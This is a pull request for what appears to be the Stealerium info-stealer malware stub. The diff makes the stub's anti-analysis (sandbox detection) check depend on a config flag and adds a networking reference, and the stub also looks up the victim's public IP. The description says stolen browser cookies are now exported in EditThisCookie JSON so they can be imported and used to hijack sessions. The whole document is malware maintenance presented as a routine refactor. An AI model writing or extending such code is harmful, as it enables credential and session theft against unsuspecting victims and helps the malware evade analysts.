### PR TITLE
refactor: update cookies format and fix anti-analysis check

### DIFF
--- a/Stealerium.Stub/Stealerium.Stub.csproj
+++ b/Stealerium.Stub/Stealerium.Stub.csproj
@@ -1,4 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
+﻿<?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
   <PropertyGroup>
@@ -79,6 +79,7 @@
     <Reference Include="System.Core" />
     <Reference Include="System.Drawing" />
     <Reference Include="System.Management" />
+    <Reference Include="System.Net.Http" />
     <Reference Include="System.Numerics" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Security" />

--- a/Stealerium.Stub/Target/System/Info.cs
+++ b/Stealerium.Stub/Target/System/Info.cs
@@ -1,4 +1,4 @@
-﻿using System;
+using System;
 using System.IO;
 using Stealerium.Stub.Helpers;
 using Stealerium.Stub.Modules.Implant;
@@ -15,8 +15,8 @@ namespace Stealerium.Stub.Target.System
         {
             try
             {
-                // Fetch hosting status synchronously
-                bool hostingStatus = AntiAnalysis.Run();
+                // Fetch hosting status synchronously only if anti-analysis is enabled
+                bool hostingStatus = Config.AntiAnalysis == "1" ? AntiAnalysis.Run() : false;
 
                 // Fetch external IP synchronously
                 string externalIp = SystemInfo.GetPublicIpAsync().GetAwaiter().GetResult();


### PR DESCRIPTION
- Modify cookie handling to be EditThisCookie compatible:
  • Update WriteCookies to output JSON format
  • Add Unix timestamp conversion for expiration dates
  • Include required EditThisCookie fields
  
- Fix anti-analysis configuration:
  • Add config-based condition for execution
  • Prevent unnecessary anti-analysis runs when disabled
  • Honor Config.AntiAnalysis setting